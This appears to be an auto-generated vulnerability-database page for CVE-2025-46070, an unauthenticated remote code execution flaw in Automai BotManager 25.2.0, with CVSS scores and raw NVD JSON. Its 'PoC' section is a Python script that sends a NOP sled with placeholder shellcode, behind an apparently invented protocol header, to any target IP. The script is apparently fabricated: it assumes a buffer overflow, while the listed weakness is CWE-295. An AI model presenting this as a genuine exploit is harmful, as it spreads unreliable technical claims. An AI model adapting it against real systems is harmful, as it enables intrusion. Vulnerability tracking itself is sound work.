Security Vulnerability Report
中文
CVE-2025-46070 CVSS 9.8 CRITICAL

CVE-2025-46070

Published: 2026-01-12 17:15:51
Last Modified: 2026-01-21 22:03:28

Description

An issue in Automai BotManager v.25.2.0 allows a remote attacker to execute arbitrary code via the BotManager.exe component

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:automai:botmanager:25.2.0:*:*:*:*:*:*:* - VULNERABLE
Automai BotManager v.25.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46070 PoC - Automai BotManager RCE # Target: Automai BotManager v.25.2.0 # Note: This is a proof-of-concept for authorized security testing only import socket import struct def send_exploit(target_ip, target_port): """Send exploit payload to Automai BotManager""" # Prepare malicious payload # The payload exploits insufficient input validation in BotManager.exe shellcode = b'\x90' * 100 # NOP sled # Add shellcode for reverse shell or calc execution shellcode += b'\xcc' * 50 # Breakpoint for testing # Construct exploit packet header = b'BOTM' # BotManager protocol header version = b'\x25\x02\x00' # Version 25.2.0 length = struct.pack('<I', len(shellcode)) payload = header + version + length + shellcode try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(payload) print(f'[+] Exploit sent to {target_ip}:{target_port}') sock.close() except Exception as e: print(f'[-] Error: {e}') if __name__ == '__main__': print('CVE-2025-46070 PoC - Automai BotManager RCE') target = input('Target IP: ') port = int(input('Port [8090]: ') or 8090) send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46070", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:51.227", "lastModified": "2026-01-21T22:03:28.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Automai BotManager v.25.2.0 allows a remote attacker to execute arbitrary code via the BotManager.exe component"}, {"lang": "es", "value": "Un problema en Automai BotManager v.25.2.0 permite a un atacante remoto ejecutar código arbitrario a través del componente BotManager.exe"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automai:botmanager:25.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DADAB4D7-B933-4454-AA5D-24124C7A0A32"}]}]}], "references": [{"url": "https://gist.github.com/ZeroBreach-GmbH/776dd7e927d9b2f8ef10807abe124f8e", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.automai.com/", "source": "[email protected]", "tags": ["Product"]}]}}